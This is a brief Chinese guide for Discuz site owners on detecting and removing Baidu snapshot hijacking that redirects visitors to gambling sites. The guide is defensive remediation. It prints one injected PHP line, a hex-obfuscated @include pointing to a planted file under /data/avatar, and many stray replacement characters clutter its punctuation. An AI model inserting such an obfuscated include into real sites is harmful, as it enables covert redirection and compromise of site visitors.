目前已遇到兩例discuz網(wǎng)站百度快照被劫持的例子����,一般快照被劫持很難被發(fā)現(xiàn)。
被劫持的表現(xiàn)為:
在百度中輸入自己的網(wǎng)址�����,出現(xiàn)被收錄的帖子鏈接����,點擊后就跳轉(zhuǎn)到菠菜網(wǎng)站等。
下面講下如何解決該問題:
進discuz后臺找到工具-文件校驗����,看下最近有哪些php文件被修改了�。
1���、排查網(wǎng)站源文件的php 文件�,查看是否有出現(xiàn)IP地址�、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了���。
2��、排查網(wǎng)站源文件的php 文件����,查看是否有如下代碼:@include($_SERVER[‘DOCUMENT_ROOT’]
如果有就刪除此段代碼����。并把該段代碼進行解密。
舉例:@include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F646174612F6176617461722F30'));
需要解密的代碼為:2F646174612F6176617461722F30
解密后為:/data/avatar/0
意思就是在上述路徑下存在被非法上傳的文件��,用于做快照劫持��。
解決辦法:刪除上面的代碼和文件即可�����。
掛馬問題解決了后�,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復(fù)雜一點�����。
